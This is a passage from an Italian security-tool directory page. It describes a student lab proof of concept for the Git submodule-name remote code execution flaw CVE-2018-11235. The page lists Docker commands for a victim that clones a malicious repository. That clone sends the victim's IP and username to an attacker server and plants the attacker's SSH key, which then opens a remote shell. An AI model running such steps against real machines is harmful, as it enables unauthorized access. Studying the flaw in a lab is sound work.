Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2018-11235 — Prova di concetto - Sfruttamento RCE : vulnerabilità dei nomi dei sottomoduli Git - Ensimag Novembre 2018 | Kitploit
Strumenti/GitHubGitHub/ygouzerh/cve-2018-11235
Analisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneStrumento di Accesso RemotoLab e Pratica
GitHubygouzerh/cve-2018-11235

CVE-2018-11235

Prova di concetto - Sfruttamento RCE : vulnerabilità dei nomi dei sottomoduli Git - Ensimag Novembre 2018

Vedi Repository
17 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

CVE-2018-11235

Per iniziare

Per creare i contenitori Docker, usa:

root@kitploit:~
make docker

(I seguenti comandi make devono essere eseguiti in parallelo su terminali diversi dalla propria macchina)

Per avviare il contenitore del server attaccante, usa:

root@kitploit:~
make run_server

per avviare il contenitore che rappresenta la vittima, usa:

root@kitploit:~
make run_client

Il contenitore eseguirà lo script client.py. Lo script trasmetterà il suo indirizzo IP e il nome utente all'attaccante.

Segui le istruzioni della console dei client per clonare il repository git malevolo.

root@kitploit:~
git clone --recurse-submodules root@server:home/poc/malicious_repo client_pwned

Noterai che l'indirizzo IP e il nome utente della vittima vengono trasmessi al server.

Dopo il clone, verifica che la chiave pubblica degli attaccanti sia stata aggiunta agli authorized_keys del client.

Successivamente, puoi aprire una shell sul client dal server, grazie al comando seguente (da eseguire sulla tua macchina):

root@kitploit:~
make server_bash

ssh <transmitted_username>@<transmitted_host>

Domande

Se dovessi avere qualsiasi problema per eseguire questo Proof of Concept, per favore crea un issue su questo repository: https://github.com/ygouzerh/CVE-2018-11235/issues , ti risponderemo il più rapidamente possibile.

Scarica lo strumento